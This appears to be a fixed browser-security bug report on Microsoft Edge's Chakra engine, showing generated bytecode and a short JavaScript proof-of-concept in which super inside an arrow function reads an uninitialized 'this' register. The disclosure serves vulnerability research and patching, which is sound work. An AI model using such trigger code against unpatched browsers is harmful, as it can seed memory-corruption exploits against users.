New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Aug 16
Cc:



Sign in to add a comment
Microsoft Edge: Chakra: EmitAssignment uses the "this" register without initializing
Project Member Reported by lokihardt@google.com, Jun 7 Back to list
"EmitAssignment" doesn't call "EmitSuperMethodBegin" that initializes the "this" register for the case when the super keyword is used. 

Here's the generated bytecode for the lambda function in the PoC. R5 is uninitialized.
Function Anonymous function ( (#1.3), #4) (In0) (size: 7 [7])
      9 locals (1 temps from R8), 1 inline cache
    Constant Table:
    ======== =====
     R1 LdRoot    
     R2 Ld_A       (undefined)
     R3 LdC_A_I4   int:1 
    
    0000   ProfiledLdEnvSlot    R6 = [1][4]  <0> 
    000c   ProfiledLdEnvSlot    R4 = [1][3]  <1> 


  Line  28: super.a = 1;
  Col   13: ^
    0018   LdHomeObjProto       R8  R4 
    001d   ProfiledStSuperFld   R8.(this=R5) = R3 #0 <0> 
    0025   LdUndef              R0 


  Line  29: }
  Col    9: ^
    0027   Ret

PoC:
class Parent {

};

class Child extends Parent {
    constructor() {
        (() => {
            super.a = 10;  // Implicitly use the "this" register. So it must be initialized.
        })();
    }
};

new Child();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member Comment 1 by lokihardt@google.com, Aug 16
Labels: MSRC-39102
Status: Fixed
Project Member Comment 2 by lokihardt@google.com, Aug 16
Labels: -Restrict-View-Commit
Sign in to add a comment